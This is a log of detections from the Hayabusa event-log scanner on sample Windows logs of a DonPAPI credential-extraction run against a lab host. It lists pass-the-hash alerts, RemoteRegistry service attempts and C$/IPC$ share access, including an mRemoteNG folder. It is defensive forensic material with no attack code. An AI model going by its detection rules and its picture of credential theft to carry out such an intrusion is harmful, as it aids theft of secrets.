admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.300 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.333 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.367 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.382 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.461 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.476 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.539 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.601 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.664 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.743 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.821 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.884 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.946 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 